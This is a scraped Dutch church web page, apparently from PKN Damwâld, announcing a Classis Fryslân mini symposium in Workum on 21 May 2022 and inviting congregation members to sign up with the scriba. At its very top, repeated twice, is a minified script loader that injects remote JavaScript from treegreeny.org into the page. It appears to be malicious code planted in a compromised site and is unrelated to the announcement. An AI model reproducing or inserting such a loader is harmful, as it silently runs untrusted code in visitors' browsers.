;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mini symposium Classis Fryslân ... Friese kerken hebben toekomst - PKN Damwâld
21 mei 2022
09:30 t/m 14:30
Mini symposium Classis Fryslân … Friese kerken hebben toekomst

Op zaterdag 21 mei organiseert de Classis Friesland een bijeenkomst in Workum. Deze is bedoeld voor alle gemeenteleden. De uitnodiging treft u aan in de Paadwizer. De classis ziet graag dat alle leden van PKN-gemeenten in Fryslân elkaar ontmoeten en in gesprek raken. Als u wilt gaan, en u heeft er vragen over, hoor ik het graag. Ik heb dan ook enige informatie vanuit de classis hoe er gesproken zal gaan worden over alternatieve manieren waarop een kerkenraad kan gaan functioneren. U kunt zich ook (tot uiterlijk 8 mei) bij mij opgeven, zodat ik het door geef aan de classis. Mogelijk kunnen we dan ook het vervoer wat coördineren. Van harte aanbevolen!!

Scriba Geralda Teertstra